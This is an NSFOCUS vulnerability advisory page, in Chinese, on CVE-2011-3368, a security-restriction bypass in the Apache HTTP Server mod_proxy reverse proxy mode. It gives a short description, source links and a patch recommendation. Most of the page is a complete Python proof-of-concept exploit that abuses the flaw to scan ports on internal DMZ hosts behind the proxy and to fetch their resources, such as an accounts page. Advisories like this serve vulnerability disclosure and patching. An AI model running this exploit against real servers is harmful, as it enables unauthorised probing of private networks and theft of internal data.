绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

Apache HTTP Server mod_proxy Reverse代理模式安全限制绕过漏洞

发布日期：2011-10-06
更新日期：2011-10-06

受影响系统：

Apache Group Apache HTTP Server 2.2.x

描述：

CVE ID: CVE-2011-3368

Apache HTTP Server是Apache软件基金会的一个开放源代码的网页服务器，可以在大多数电脑操作系统中运行，由于其跨平台和安全性被广泛使用，是最流行的Web服务器端软件之一。

Apache HTTP Server的mod_proxy模块在实现上存在安全漏洞，可被恶意用户利用绕过某些安全限制。

此漏洞源于mod_proxy模块，在反向代理模式中配置时，错误地处理了某些Web请求。可被利用通过特制的URL向代理背后的服务器发送请求。

<*来源：Michael Jordon （disclosure@contextis.co.uk）

  链接：http://www.contextis.com/research/blog/reverseproxybypass/
        http://mail-archives.apache.org/mod_mbox/httpd-announce/201110.mbox/browser
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Michael Jordon （disclosure@contextis.co.uk）提供了如下测试方法：
http://www.exploit-db.com/download/17969

#!/usr/bin/env python

import socket
import string
import getopt, sys

known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]

def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):

    get = "GET " + url + "@" + internal_target + ":" + internal_port +  "/" + resource + " HTTP/1.1\r\n"
    get = get + "Host: " + apache_target + "\r\n\r\n"

    remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remoteserver.settimeout(3)

    try:
        remoteserver.connect((apache_target, int(apache_port)))
        remoteserver.send(get)
        return remoteserver.recv(4096)
    except:
        return ""

def get_banner(result):
    return result[string.find(result, "\r\n\r\n")+4:]

def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):

    print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
    for port in tested_ports:
        port = str(port)
        result = send_request(url, apache_target, apache_port, internal_target, port, resource)
        if string.find(result,"HTTP/1.1 200")!=-1 or \
        string.find(result,"HTTP/1.1 30")!=-1 or \
        string.find(result,"HTTP/1.1 502")!=-1:
            print "- Open port: " + port + "/TCP"
            print get_banner(result)
        elif len(result)==0:
            print "- Filtered port: " + port + "/TCP"
        else:
            print "- Closed port: " + port + "/TCP"


def usage():
    print
    print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
    print "http://www.secforce.co.uk"
    print
    print "usage():"
    print "python apache_scan.py [options]"
    print
    print " [options]"
    print "     -r: Remote Apache host"
    print "     -p: Remote Apache port (default is 80)"
    print "     -u: URL on the remote web server (default is /)"
    print "     -d: Host in the DMZ (default is 127.0.0.1)"
    print "     -e: Port in the DMZ (enables 'single port scan')"
    print "     -g: GET request to the host in the DMZ (default is /)"
    print "     -h: Help page"
    print
    print "examples:"
    print " - Port scan of the remote host"
    print "     python apache_scan.py -r www.example.com -u /images/test.gif"
    print " - Port scan of a host in the DMZ"
    print "     python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
    print " - Retrieve a resource from a host in the DMZ"
    print "     python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
    print

def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
    print
    print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
    print "http://www.secforce.co.uk"
    print
    print " [+] Target: " + apache_target
    print " [+] Target port: " + apache_port
    print " [+] Internal host: " + internal_target
    print " [+] Tested ports: " + str(tested_ports)
    print " [+] Internal resource: " + resource
    print

def main():

    global apache_target
    global apache_port
    global url
    global internal_target
    global internal_port
    global resource

    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit(2)

    try:
        for o, a in opts:
            if o in ("-h", "--help"):
                usage()
                sys.exit(2)
            if o == "-u":
                url=a
            if o == "-r":
                apache_target=a
            if o == "-p":
                apache_port=a
            if o == "-d":
                internal_target = a
            if o == "-e":
                internal_port=a
            if o == "-g":
                resource=a

    except getopt.GetoptError:
        usage()
        sys.exit(2)

    if apache_target == "":
        usage()
        sys.exit(2)

url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"

main()

if internal_port!="":
    tested_ports = [internal_port]
else:
    tested_ports = known_ports

scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)

建议：

厂商补丁：

Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://httpd.apache.org/

浏览次数：5318
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客